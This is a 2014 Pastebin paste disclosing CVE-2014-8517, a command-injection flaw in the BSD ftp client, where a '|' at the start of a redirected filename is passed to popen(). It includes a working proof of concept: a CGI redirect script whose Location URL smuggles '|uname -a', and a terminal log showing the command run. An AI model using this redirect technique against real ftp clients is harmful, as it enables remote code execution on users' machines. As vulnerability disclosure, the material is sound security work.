API tools faq
paste
Advertisement
emin_int11

ftp command execution

emin_int11
Nov 5th, 2014
384
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.31 KB | None | 0 0
raw download clone embed print report
  1. eminghuliev
  2. FreeBSD FTP code execution
  3. CVE ID: CVE-2014-8517
  4.  
  5. ___ snippet ___
  6. ==== > fetch_url(const char *url, const char *proxyenv, char *proxyauth, char *wwwauth)
  7. /*
  8. * Only trust filenames with special meaning if they came from
  9. * the command line
  10. */
  11. if (outfile == savefile) {
  12. if (strcmp(savefile, "-") == 0) {
  13. fout = stdout;
  14. } else if (*savefile == '|') {
  15. oldpipe = xsignal(SIGPIPE, SIG_IGN);
  16. fout = popen(savefile + 1, "w");
  17. if (fout == NULL) {
  18. warn("Can't execute `%s'", savefile + 1);
  19. goto cleanup_fetch_url;
  20. }
  21. closefunc = pclose;
  22. }
  23. }
  24. Output filename if contain "|" symbol and command execute.
  25. |||||| If the sent pipe symbol, popen function is being to execute
  26. proof ?
  27. else if (*savefile == '|') {
  28. === > fout = popen(savefile + 1, "w");
  29.  
  30. popen function describe:
  31. popen - initiate pipe streams to or from a process
  32. The popen() function shall execute the command specified by the string command. It shall create a pipe between the calling program and the executed command, and shall return a pointer to a stream that can be used to either read from or write to the pipe. The environment of the executed command shall be as if a child process were created within the popen() call using the fork() function, and the child invoked the sh utility using the call:
  33.  
  34.  
  35. a20$ pwd
  36. /var/www/cgi-bin
  37. a20$ ls -l
  38. total 4
  39. -rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
  40. -rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a
  41. a20$ cat redirect
  42. #!/bin/sh
  43. echo 'Status: 302 Found'
  44. echo 'Content-Type: text/html'
  45. echo 'Connection: keep-alive'
  46. echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
  47. echo
  48. a20$
  49. a20$ ftp http://localhost/cgi-bin/redirect
  50. Trying ::1:80 ...
  51. ftp: Can't connect to `::1:80': Connection refused
  52. Trying 127.0.0.1:80 ...
  53. Requesting http://localhost/cgi-bin/redirect
  54. Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
  55. Requesting http://192.168.2.19/cgi-bin/|uname%20-a
  56. 32 101.46 KiB/s
  57. 32 bytes retrieved in 00:00 (78.51 KiB/s)
  58. NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
  59.  
  60.  
  61. reference:
  62. http://pubs.opengroup.org/onlinepubs/009695399/functions/popen.html
  63. http://seclists.org/oss-sec/2014/q4/459
  64.  
  65.  
  66. @st1ll_di3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!